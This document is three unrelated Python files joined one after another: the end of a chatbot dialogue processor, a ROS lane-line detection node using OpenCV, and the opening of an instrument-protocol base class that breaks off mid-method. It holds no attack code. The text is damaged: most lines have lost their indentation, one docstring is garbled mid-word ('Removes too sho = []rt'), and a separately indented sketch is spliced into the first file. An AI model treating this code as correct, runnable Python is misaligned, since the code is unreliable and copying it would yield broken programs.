# this actually just calls the policy's method by the same name
action = self._get_next_action(tracker)
should_predict_another_action = self._run_action(action, tracker, dispatcher)
number_of_predicted_actions += 1
if number_of_predicted_actions == self.max_number_of_predictions and should_predict_another_action:
# circuit breaker was tripped
logger.warn("Circuit breaker tripped. Stopped predicting more actions for sender '{}'".format(
tracker.sender_id))
if self.on_circuit_break:
self.on_circuit_break(tracker, dispatcher) # calls the cicuit breaking callback
logger.debug("Current topic: {}".format(tracker.topic_stack.top.name))
def _should_predict_another_action(self, action, events):
is_listen_action = isinstance(action, ActionListen)
contains_restart = events and isinstance(events[0], Restart)
return not is_listen_action and not contains_restart
def _schedule_reminder(self, reminder, tracker, dispatcher):
# type: (Reminder, DialogueStateTracker, Dispatcher) -> None
"""Uses the scheduler to time a job to trigger the passed reminder.
Reminders with the same `id` property will overwrite one another (i.e. only one of them will eventually run)."""
scheduler.add_job(self.handle_reminder, 'date', run_date=reminder.trigger_date_time,
args=[reminder, dispatcher], id=reminder.id, replace_existing=True)
def _run_action(self, action, tracker, dispatcher):
# events and return values are used to update
# the tracker state after an action has been taken
events = action.run(dispatcher, tracker, self.domain)
        # Ensures that the code still works even if a lazy programmer forgot to type `return []`
        # at the end of an action or the run method returns `None` for some other reason
if events is None:
events = []
logger.debug("Action '{}' ended with events '{}'".format(
action.name(), ['{}'.format(e) for e in events]))
# log the action and its produced events
tracker.log_event(ExecutedAction(action.id_str()))
        if events:  # prevents failure if an action doesn't return `[]` but `None`
for e in events:
tracker.log_event(e)
if isinstance(e, Reminder):
self._schedule_reminder(e, tracker, dispatcher)
return self._should_predict_another_action(action, events)
def _get_tracker(self, sender):
# type: (Text) -> DialogueStateTracker
sender_id = sender or UserMessage.DEFAULT_SENDER
tracker = self.tracker_store.get_or_create_tracker(sender_id)
return tracker
def _save_tracker(self, tracker):
self.tracker_store.save(tracker)
def _get_next_action(self, tracker):
follow_up_action = tracker.follow_up_action
if follow_up_action:
tracker.clear_follow_up_action()
if self.domain.index_for_action(follow_up_action.id_str()) is not None:
return follow_up_action
else:
logger.error("Trying to run unknown follow up action '{}'!".format(follow_up_action) +
"Instead of running that, we will ignore the action and predict the next action ourself.")
if tracker.latest_message.intent.get("name") == self.domain.restart_intent:
return ActionRestart()
idx = self.policy_ensemble.predict_next_action(tracker, self.domain)
return self.domain.action_for_index(idx)
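# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the producer/consumer
# pattern that handle_asynchronous() and handle_channel_asynchronous() build
# on, reduced to an InMemoryMessageQueue and plain strings instead of real
# UserMessage objects and a MessageProcessor. The names defined below are made
# up for this example; the sketch assumes this module's imports are available.
# ---------------------------------------------------------------------------
def _demo_queue_worker():
    demo_queue = InMemoryMessageQueue()

    def worker():
        while True:
            item = demo_queue.dequeue()  # blocks until something is enqueued
            if item == "stop":
                break
            logger.info("handled: %s", item)

    worker_thread = Thread(target=worker)
    worker_thread.daemon = True
    worker_thread.start()

    for text in ["hello", "how are you", "stop"]:
        demo_queue.enqueue(text)
    worker_thread.join()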
|
sunny_new_line_detect_simple_gazebo.py
|
#!/usr/bin/env python
from cv_bridge import CvBridge, CvBridgeError
from duckietown_utils.jpg import image_cv_from_jpg #location:f23-LED/led_detection/include
import threading
import rospy
import numpy as np
import cv2
import math
from sensor_msgs.msg import CompressedImage, Image
from ino_car.msg import LaneLine, LaneLines
class LineDetectorNode(object):
def __init__(self):
self.node_name = "LineDetectorNode"
self.verbose = None
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
self.pub_lines = rospy.Publisher("~segment_list", LaneLines, queue_size=1)
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
#------------------------------------------
self.bottom_width = 0.85 # width of bottom edge of trapezoid, expressed as percentage of image width
self.top_width = 0.75 # ditto for top edge of trapezoid
self.height = 0.4 # height of the trapezoid expressed as percentage of image height
self.height_from_bottom = 0.05 # height from bottom as percentage of image height
self.x_translation = -0.01 # Can be +ve or -ve. Translation of midpoint of region of interest along x axis
self.center =[0,0]
self.hasleft= False
self.hasright = False
self.lanewidth =400
# -----------------------------------------
#color
self.hsv_white1= np.array([0,0,150])
self.hsv_white2= np.array([180,50,255])
self.hsv_yellow1= np.array([25,120,90])
self.hsv_yellow2= np.array([45,255,255])
self.hsv_red1= np.array([0,140,100])
self.hsv_red2= np.array([15,255,255])
self.hsv_red3= np.array([165,140,100])
self.hsv_red4= np.array([180,255,255])
self.dilation_kernel_size = 3
#----------------------------------------
def _colorFilter(self,hsv,color):
# threshold colors in HSV space
bw_red = cv2.inRange(hsv, self.hsv_red1, self.hsv_red2)
bw_white = cv2.inRange(hsv, self.hsv_white1, self.hsv_white2)
bw_yellow = cv2.inRange(hsv, self.hsv_yellow1, self.hsv_yellow2)
if color == 'white':
bw = bw_white
elif color == 'yellow':
bw = bw_yellow
elif color == 'red':
bw = bw_red
# binary dilation
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(self.dilation_kernel_size, self.dilation_kernel_size))
bw = cv2.dilate(bw, kernel)
if self.verbose:
color_segments = self.color_segment(bw_white,bw_red,bw_yellow)
else:
color_segments = []
return bw, color_segments
def detectLines(self,img,color,img_shape):
lines = self.hough_transform(img)
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_short_lines(lines)
# Separating lines on left and right side of the highway lane
lane_lines_=[]
if color == 'yellow':
if lane_lines is None:
return None,None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
lane_line = self.draw_single_line(lane_lines_ ,img_shape)
return lane_line,lane_lines
if color == 'white':
if lane_lines is None:
                print('no white')
                return None, None, None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
left_lines,right_lines = self.separate_white_lines(lane_lines_)
right_lane_line = self.draw_single_line( right_lines,img_shape )
left_lane_line = self.draw_single_line( left_lines,img_shape )
return left_lane_line ,right_lane_line ,lane_lines
def filter_horizontal_short_lines(self,lines):
"""
1.Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
2.Removes too sho = []rt
"""
if lines is None:
return
#for l in lines:
# dist = math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 )
# print dist
non_short_lines = [l for l in lines if
not math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 ) < 20]
non_vertical_lines = [l for l in non_short_lines if
not float(l[0][2] - l[0][0]) == 0]
vertical_lines = [l for l in lines if
float(l[0][2] - l[0][0]) == 0]
non_horizontal_lines = [l for l in non_vertical_lines if
not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) /float(l[0][2] - l[0][0])) ) <= 10]
if len(vertical_lines) != 0 :
for v in vertical_lines:
non_horizontal_lines.append(v)
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
def cbImage(self, image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start() #start execution
# Returns rightaway
def loginfo(self, s):
rospy.loginfo('[%s] %s' % (self.node_name, s))
# generate color segments
    def color_segment(self, area_white, area_red, area_yellow):
B, G, R = 0, 1, 2
def white(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
return x
def red(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 0
x[:,:,B] *= 0
return x
def yellow(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 1
x[:,:,B] *= 0
return x
h, w = area_white.shape
orig = [area_white, area_red, area_yellow]
masks = [white(area_white), red(area_red), yellow(area_yellow)]
res = np.zeros((h,w,3), dtype=np.uint8)
for i, m in enumerate(masks):
nz = (orig[i] > 0) * 1.0
assert nz.shape == (h, w), nz.shape
for j in [0, 1, 2]:
res[:,:,j] = (1-nz) * res[:,:,j].copy() + (nz) * m[:,:,j]
return res
def canny_edge_median(self,img):
"""canny_edge_median takes an image and does auto-thresholding
using median to compute the edges using canny edge technique
"""
median = np.median(img)
low_threshold = median * 0.66
upper_threshold = median * 1.33
return cv2.Canny(img, low_threshold, upper_threshold)
def region_of_interest(self,img, vertices):
"""
Only keeps the part of the image enclosed in the polygon and
sets rest of the image to black
"""
mask = np.zeros_like(img)
mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image, mask
def highway_lane_lines(self,img,img_shape ):
"""
Computes hough transform, separates lines on left and right side of the highway lane computed
by hough transform, then forms a single line on the right side and left side
"""
# Computing lines with hough transform
lines = self.hough_transform(img)
if lines is None:
return None,None,None
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_lines(lines)
# Separating lines on left and right side of the highway lane
left_lines, right_lines = self.separate_lines(lane_lines)
# Filtering lines i.e. removing left lines that are closer to right side and vice versa
left_lines, right_lines = self.filter_lane_lines(left_lines, right_lines,)
# Computing one single line for left and right side
left_side_line = self.draw_single_line(left_lines,img_shape )
right_side_line = self.draw_single_line(right_lines,img_shape )
return left_side_line, right_side_line,lines
#return left_lines, right_lines,lane_lines
def hough_transform(self,img):
"""
Computes lines using the probabilistic hough transform provided by OpenCV
Thus it computes lines of finite size and returns them in form of an array
:param img: masked edge detected image with only region of interest
:return:
"""
# Parameters
rho = 2 # distance resolution in pixels of the Hough grid
theta = 1 * np.pi / 18 # angular resolution in radians of the Hough grid
threshold = 10 # minimum number of votes (intersections in Hough grid cell)
        min_line_length = 10  # minimum number of pixels making up a line
        max_line_gap = 15  # maximum gap in pixels between connectable line segments
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_length,
maxLineGap=max_line_gap)
return lines
def filter_horizontal_lines(self,lines):
"""
Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
"""
if lines is None:
return
        non_horizontal_lines = [l for l in lines if
                                not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) / (0.0001 + float(l[0][2] - l[0][0])))) <= 10]
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
def separate_white_lines(self,lines):
"""
Separates the left and right white lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
        if lines is None or len(lines) == 0:
            return [], []
        x_m = 0
        for x1, y1, x2, y2 in lines:
            x_m += x1
            x_m += x2
        x_m = x_m / (2 * len(lines))  # mean x over all line endpoints
right_lines = [l for l in lines if l[0] >= x_m]
left_lines = [l for l in lines if l[0] < x_m]
return left_lines,right_lines
def separate_lines(self,lines):
"""
Separates the left and right lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
left_lines = []
right_lines = []
# Here we separate coordinates of left and right-side lines of the highway lane
# Since the y-axis is positive in downwards direction and x-axis is positive in right hand direction
# With origin at the top left corner of the image
# A negative slope will mean that the line is on the left ( in normal coordinate system it
# will mean on the right side)
# A positive slope will mean that the line is on the right ( in normal coordinate system it
# will mean on the left side)
for l in lines:
            slope = float(l[0][3] - l[0][1]) / (0.0001 + float(l[0][2] - l[0][0]))
if slope < 0:
# Slope is negative hence line is on the left side
left_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
elif slope > 0:
# Slope is positive hence line is on the right side
right_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
else:
print("Something looks fishy here")
return left_lines, right_lines
def filter_lane_lines(self,left_lines, right_lines):
"""
This function removes lines from left_lines that are closer to the right-side of the highway lane
and from right_lines removes lines that are closer to left-side of highway lane. It also removes
the lines which are more or less than 10 degrees from the median slope of each side.
"""
if len(left_lines) == 0 or len(right_lines) == 0:
return left_lines, right_lines
# Filtering lines that lie close to the other side, for instance
# lines in left_lines array that are closer to the right lane line
x_top_left = []
for x1, y1, x2, y2 in left_lines:
x_top_left += [x2]
x_top_left_median = np.median(x_top_left)
left_lines_final = [l for l in left_lines if l[2] <= x_top_left_median]
slope_left_lines = []
for x1, y1, x2, y2 in left_lines_final:
slope_left_lines += [np.rad2deg(np.arctan((y2 - y1) / (x2 - x1)))]
x_top_right = []
for x1, y1, x2, y2 in right_lines:
x_top_right += [x1]
x_top_right_median = np.median(x_top_right)
right_lines_final = [l for l in right_lines if l[0] >= x_top_right_median]
slope_right_lines = []
for x1, y1, x2, y2 in right_lines_final:
slope_right_lines += [np.rad2deg(np.arctan((y2 - y1)/(x2 - x1)))]
# Filtering based on slope
median_left_lines_slope = np.median(slope_left_lines)
left_lines_final_filtered = []
for i in range(len(left_lines_final)):
if (-1 + median_left_lines_slope) <= slope_left_lines[i] <= (10 + median_left_lines_slope):
left_lines_final_filtered += [left_lines_final[i]]
median_right_lines_slope = np.median(slope_right_lines)
right_lines_final_filtered = []
for i in range(len(right_lines_final)):
if (-5 + median_right_lines_slope) <= slope_right_lines[i] <= (5 + median_right_lines_slope):
right_lines_final_filtered += [right_lines_final[i]]
return left_lines_final_filtered, right_lines_final_filtered
def draw_single_line(self,lines,img_shape):
"""
Takes in an array of lines and combines them into a single line
"""
if len(lines) == 0:
return None
        # Maximum and minimum y-coordinate for the single line on left and right side
y_max = int(img_shape[0] - img_shape[0] * self.height_from_bottom)
y_min = int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)
# Computing the top and bottom x co-ordinate obtained by extrapolating
# the limited length lines.
x_top = []
x_bottom = []
for x1, y1, x2, y2 in lines:
z = np.polyfit([x1, x2], [y1, y2], 1)
m, c = z
x_top.append(int((y_min - c) / m))
x_bottom.append(int((y_max - c) / m))
x_avg_top = np.int(np.median(x_top))
x_avg_bottom = np.int(np.median(x_bottom))
return [x_avg_bottom, y_max, x_avg_top, y_min]
def compute_mask_vertices(self,img_shape):
"""
This function takes an image as input, requires the parameters to be set manually
and generates the coordinates for the mask vertices.
"""
vertices = np.array(
[[[(img_shape[1] * (1 - self.bottom_width)) // 2, int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] *self.bottom_width) + (img_shape[1] * (1 - self.bottom_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] * self.top_width) + (img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)],
[(img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)]]],
dtype=np.int32)
vertices = np.array(vertices[:] - [self.x_translation * img_shape[1], 0], dtype='int')
return vertices
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
try:
self.processImage_(image_msg)
finally:
# Release the thread lock
self.thread_lock.release()
def processImage_(self, image_msg):
# Decode from compressed image with OpenCV
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
self.loginfo('Could not decode image: %s' % e)
return
# Resize and crop image
hei_original, wid_original = image_cv.shape[0:2]
gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)
# Applying gaussian blur
blur = cv2.GaussianBlur(gray, (5, 5), 0)
# color
hsv = cv2.cvtColor(image_cv, cv2.COLOR_BGR2HSV)
        white, color_segments = self._colorFilter(hsv, 'white')  # white: binary mask; color_segments: color-coded debug image
yellow, color_segments = self._colorFilter(hsv,'yellow')
# Computing edges
img_edges = self.canny_edge_median(blur)
# Computing region of interest
img_shape = gray.shape
my_vertices = self.compute_mask_vertices(img_shape)
masked_image, mask = self.region_of_interest(img_edges, my_vertices)
#bitwise edge, color, mask
edge_yellow = cv2.bitwise_and(yellow, masked_image)
edge_white = cv2.bitwise_and(white, masked_image)
# Computing lane lines
        right_white_line, left_white_line, white_lines = self.detectLines(edge_white, 'white', img_shape)  # right and left are swapped because the image coordinate frame differs from the normal frame
yellow_line, yellow_lines = self.detectLines(edge_yellow,'yellow',img_shape)
# handle two white line at same side
if left_white_line and right_white_line:
if ((left_white_line[0]-left_white_line[2])/2 - (yellow_line[0]- yellow_line[2])/2) > 0:
right_white_line = map(lambda x: x/2, list(np.array(right_white_line)+np.array(left_white_line)))
left_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) - (right_white_line[0] +right_white_line[2]) > self.lanewidth:
right_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) > (right_white_line[0] +right_white_line[2]):
yellow_line = None
# SegmentList constructor
segmentList = LaneLines()
segmentList.header.stamp = image_msg.header.stamp
image_with_lines = np.copy(image_cv)
# draw line on image_With_line
if yellow_line is not None:
cv2.line(image_with_lines, (yellow_line[0], yellow_line[1]), (yellow_line[2], yellow_line[3]), (0, 255, 0), 5)
self.hasleft = True
segmentList.lanelines.extend(self.toSegmentMsg(yellow_line,LaneLine.LEFT))
if right_white_line is not None:
cv2.line(image_with_lines, (right_white_line[0], right_white_line[1]), (right_white_line[2], right_white_line[3]), (0, 0, 255), 5)
self.hasright = True
segmentList.lanelines.extend(self.toSegmentMsg(right_white_line,LaneLine.RIGHT))
# Publish segmentList
self.pub_lines.publish(segmentList)
# plot on image_With_line
if white_lines is not None:
for i,pl in enumerate(white_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
if yellow_lines is not None:
for i,pl in enumerate(yellow_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
'''
if self.hasleft and self.hasright:
self.center[0] = (final_left_line[0]+final_right_line[0]+final_left_line[2] +final_right_line[2])/4
self.center[1] = (final_left_line[1]+final_right_line[1]+final_left_line[3] +final_right_line[3])/4
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if self.hasleft and not self.hasright:
self.center[0] = (final_left_line[0]+final_left_line[2] )/2 + self.lanewidth/2
self.center[1] = (final_left_line[1]+final_left_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if not self.hasleft and self.hasright:
self.center[0] = (final_right_line[0]+final_right_line[2] )/2 - self.lanewidth/2
self.center[1] = (final_right_line[1]+final_right_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
'''
cv2.polylines(image_with_lines,my_vertices,True,(0,255,255))
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
def toSegmentMsg(self, line, side):
segmentMsgList = []
segment = LaneLine()
segment.side = side
segment.pixels_line[0].x = line[0]
segment.pixels_line[0].y = line[1]
segment.pixels_line[1].x = line[2]
segment.pixels_line[1].y = line[3]
segmentMsgList.append(segment)
return segmentMsgList
def onShutdown(self):
self.loginfo("Shutdown.")
if __name__ == '__main__':
rospy.init_node('line_detector',anonymous=False)
line_detector_node = LineDetectorNode()
rospy.on_shutdown(line_detector_node.onShutdown)
rospy.spin()
|
instrument_protocol.py
|
#!/usr/bin/env python
"""
@package ion.services.mi.instrument_protocol Base instrument protocol structure
@file ion/services/mi/instrument_protocol.py
@author Steve Foley,
Bill Bollenbacher
@brief Instrument protocol classes that provide structure towards the
nitty-gritty interaction with individual instruments in the system.
@todo Figure out what gets thrown on errors
"""
import time
import re
from functools import partial
from threading import Thread
from mi.core.log import get_logger, get_logging_metaclass
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.instrument.data_particle import RawDataParticle
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.driver_scheduler import DriverScheduler
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import ConfigMetadataKey
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import ResourceAgentEvent
from mi.core.instrument.protocol_param_dict import ProtocolParameterDict
from mi.core.instrument.protocol_cmd_dict import ProtocolCommandDict
from mi.core.instrument.driver_dict import DriverDict
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import NotImplementedException
from mi.core.exceptions import InstrumentParameterExpirationException
__author__ = 'Steve Foley'
__license__ = 'Apache 2.0'
log = get_logger()
MAX_BUFFER_SIZE = 32768
DEFAULT_CMD_TIMEOUT = 20
DEFAULT_WRITE_DELAY = 0
RE_PATTERN = type(re.compile(""))
class InterfaceType(BaseEnum):
"""The methods of connecting to a device"""
ETHERNET = 'ethernet'
SERIAL = 'serial'
class InitializationType(BaseEnum):
    NONE = 0
STARTUP = 1
DIRECTACCESS = 2
class InstrumentProtocol(object):
"""
Base instrument protocol class.
"""
__metaclass__ = get_logging_metaclass('trace')
def __init__(self, driver_event):
"""
Base constructor.
@param driver_event The callback for asynchronous driver events.
"""
# Event callback to send asynchronous events to the agent.
self._driver_event = driver_event
# The connection used to talk to the device.
self._connection = None
# The protocol state machine.
self._protocol_fsm = None
# The parameter, command, and driver dictionaries.
self._param_dict = ProtocolParameterDict()
self._cmd_dict = ProtocolCommandDict()
self._driver_dict = DriverDict()
# Dictionary to store recently generated particles
self._particle_dict = {}
# The spot to stash a configuration before going into direct access mode
self._pre_direct_access_config = None
# Driver configuration passed from the user
self._startup_config = {}
# scheduler config is a bit redundant now, but if we ever want to
# re-initialize a scheduler we will need it.
self._scheduler = None
self._scheduler_callback = {}
self._scheduler_config = {}
# Set the initialization type to startup so that startup parameters
        # are applied at the first opportunity.
self._init_type = InitializationType.STARTUP
self._response_handlers = {}
self._build_handlers = {}
self._newline = None
self._chunker = None
self._direct_commands = {}
self._character_delay = 0.0
self._display_name = 'instrument'
########################################################################
# Common handlers
########################################################################
def _handler_get(self, *args, **kwargs):
"""
Get device parameters from the parameter dict. First we set a baseline timestamp
that all data expirations will be calculated against. Then we try to get parameter
value. If we catch an expired parameter then we will update all parameters and get
values using the original baseline time that we set at the beginning of this method.
Assuming our _update_params is updating all parameter values properly then we can
ensure that all data will be fresh. Nobody likes stale data!
@param args[0] list of parameters to retrieve, or DriverParameter.ALL.
@raise InstrumentParameterException if missing or invalid parameter.
@raise InstrumentParameterExpirationException If we fail to update a parameter
on the second pass this exception will be raised on expired data
"""
next_state = None
# Grab a baseline time for calculating expiration time. It is assumed
        # that all data is valid if acquired after this time.
expire_time = self._param_dict.get_current_timestamp()
# build a list of parameters we need to get
param_list = self._get_param_list(*args, **kwargs)
try:
# Take a first pass at getting parameters. If they are
# expired an exception will be raised.
result = self._get_param_result(param_list, expire_time)
except InstrumentParameterExpirationException as e:
# In the second pass we need to update parameters, it is assumed
# that _update_params does everything required to refresh all
# parameters or at least those that would expire.
log.debug("Parameter expired, refreshing, %s", e)
self._update_params()
            # Take a second pass at getting values, this time it should
# have all fresh values.
log.debug("Fetching parameters for the second time")
result = self._get_param_result(param_list, expire_time)
return next_state, result
########################################################################
# Helper methods
########################################################################
def _update_params(self):
raise NotImplementedException()
def _init_params(self):
"""
Initialize parameters based on initialization type. If we actually
do some initialization (either startup or DA) after we are done
set the init type to None so we don't initialize again.
@raises InstrumentProtocolException if the init_type isn't set or it is unknown
"""
if self._init_type == InitializationType.STARTUP:
log.debug("_init_params: Apply Startup Config")
self.apply_startup_params()
self._init_type = InitializationType.NONE
elif self._init_type == InitializationType.DIRECTACCESS:
log.debug("_init_params: Apply DA Config")
self.apply_direct_access_params()
self._init_type = InitializationType.NONE
pass
elif self._init_type == InitializationType.NONE:
log.debug("_init_params: No initialization required")
pass
elif self._init_type is None:
raise InstrumentProtocolException("initialization type not set")
else:
raise InstrumentProtocolException("Unknown initialization type: %s" % self._init_type)
def got_data(self, port_agent_packet):
"""
Called by the instrument connection when data is available. Defined in subclasses.
"""
raise NotImplementedException()
def _got_chunk(self, data, timestamp):
raise NotImplementedException()
def _get_param_result(self, param_list, expire_time):
"""
return a dictionary of the parameters and values
@param expire_time: baseline time for expiration calculation
@return: dictionary of values
@raise InstrumentParameterException if missing or invalid parameter
@raise InstrumentParameterExpirationException if value is expired.
"""
result = {}
for param in param_list:
val = self._param_dict.get(param, expire_time)
result[param] = val
return result
def _verify_not_readonly(self, params_to_set, startup=False):
"""
Verify that the parameters we are attempting to set in upstream methods
are not readonly. A parameter is considered read only if it is characterized
as read-only or immutable. However, if the startup flag is passed in as true
then immutable will be considered settable.
@param params_to_set: dictionary containing parameters to set
@param startup: startup flag, if set don't verify visibility
@return: True if we aren't violating visibility
@raise: InstrumentParameterException if we violate visibility
"""
log.debug("Verify parameters are not read only, startup: %s", startup)
if not isinstance(params_to_set, dict):
raise InstrumentParameterException('parameters not a dict.')
readonly_params = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)
if not startup:
readonly_params += self._param_dict.get_visibility_list(ParameterDictVisibility.IMMUTABLE)
log.debug("Read only params: %s", readonly_params)
not_settable = []
for (key, val) in params_to_set.iteritems():
if key in readonly_params:
not_settable.append(key)
if len(not_settable) > 0:
raise InstrumentParameterException("Attempt to set read only parameter(s) (%s)" % not_settable)
return True
def _extract_sample(self, particle_class, regex, line, timestamp, publish=True):
"""
Extract sample from a response line if present and publish
parsed particle
@param particle_class The class to instantiate for this specific
data particle. Parameterizing this allows for simple, standard
behavior from this routine
@param regex The regular expression that matches a data sample
@param line string to match for sample.
@param timestamp port agent timestamp to include with the particle
@param publish boolean to publish samples (default True). If True,
two different events are published: one to notify raw data and
the other to notify parsed data.
        @retval the parsed sample (particle dict) if the line can be parsed
            for a sample. Otherwise, None.
@todo Figure out how the agent wants the results for a single poll
and return them that way from here
"""
if regex.match(line):
particle = particle_class(line, port_timestamp=timestamp)
parsed_sample = particle.generate()
# Add an entry to the particle dictionary, with the particle class as the key
self._particle_dict[particle.data_particle_type()] = parsed_sample
if publish and self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, parsed_sample)
return parsed_sample
def get_current_state(self):
"""
Return current state of the protocol FSM.
"""
return self._protocol_fsm.get_current_state()
def get_resource_capabilities(self, current_state=True):
"""
"""
res_cmds = self._protocol_fsm.get_events(current_state)
res_cmds = self._filter_capabilities(res_cmds)
res_params = self._param_dict.get_keys()
return [res_cmds, res_params]
def _filter_capabilities(self, events):
"""
"""
return events
def _async_agent_state_change(self, agent_state):
"""
        Used when we need to change the agent state from an asynchronous
process.
@param agent_state: New agent state
"""
val = {
'event': ResourceAgentEvent.CHANGE_STATE_ASYNC,
'args': [agent_state]
}
self._driver_event(DriverAsyncEvent.AGENT_EVENT, val)
def _async_raise_fsm_event(self, event, *args, **kwargs):
"""
Spawn a new thread and raise an FSM event. This is intended to be used from the listener
thread. If not used the port agent client could be blocked when a FSM event is raised.
@param event: event to raise
@param args: args for the event
@param kwargs: ignored
"""
log.info("_async_raise_fsm_event: starting new thread to raise event")
args = list(args)
log.debug('_async_raise_fsm_event event: %s args: %r', event, args)
args.insert(0, event)
def run():
try:
self._protocol_fsm.on_event(*args)
except Exception as e:
log.error('Exception in asynchronous thread: %r', e)
self._driver_event(DriverAsyncEvent.ERROR, e)
log.info('_async_raise_fsm_event: event complete. bub bye thread. (%r)', args)
new_thread = Thread(target=run)
new_thread.daemon = True
new_thread.start()
########################################################################
# Scheduler interface.
########################################################################
def _remove_scheduler(self, name):
"""
remove a scheduler in a driver.
@param name the name of the job
@raise KeyError if we try to remove a non-existent job
"""
if not self._scheduler_callback.get(name):
raise KeyError("scheduler does not exist for '%s'" % name)
log.debug("removing scheduler: %s", name)
callback = self._scheduler_callback.get(name)
try:
self._scheduler.remove_job(callback)
except KeyError:
log.warning('Unable to remove job from scheduler.')
self._scheduler_callback.pop(name)
self._scheduler_config.pop(name, None)
def _add_scheduler(self, name, callback):
"""
Stage a scheduler in a driver. The job will actually be configured
and started by initialize_scheduler
@param name the name of the job
@param callback the handler when the job is triggered
@raise KeyError if we try to add a job twice
"""
if self._scheduler_callback.get(name):
raise KeyError("duplicate scheduler exists for '%s'" % name)
log.debug("Add scheduler callback: %s", name)
self._scheduler_callback[name] = callback
self._add_scheduler_job(name)
def _add_scheduler_event(self, name, event):
"""
Create a scheduler, but instead of passing a callback we pass in
an event to raise. A callback function is dynamically created
to do this.
@param name the name of the job
@param event: event to raise when the scheduler is triggered
@raise KeyError if we try to add a job twice
"""
# Create a callback for the scheduler to raise an event
def event_callback(self, event):
log.info("driver job triggered, raise event: %s" % event)
self._protocol_fsm.on_event(event)
# Dynamically create the method and add it
method = partial(event_callback, self, event)
self._add_scheduler(name, method)
def _add_scheduler_job(self, name):
"""
Map the driver configuration to a scheduler configuration. If
the scheduler has been started then also add the job.
@param name the name of the job
@raise KeyError if job name does not exists in the callback config
@raise KeyError if job is already configured
"""
# Do nothing if the scheduler isn't initialized
if not self._scheduler:
return
callback = self._scheduler_callback.get(name)
if not callback:
raise KeyError("callback not defined in driver for '%s'" % name)
if self._scheduler_config.get(name):
raise KeyError("scheduler job already configured '%s'" % name)
scheduler_config = self._get_scheduler_config()
log.debug("Scheduler config: %r", scheduler_config)
# No config? Nothing to do then.
if scheduler_config is None:
return
job_config = scheduler_config.get(name)
if job_config:
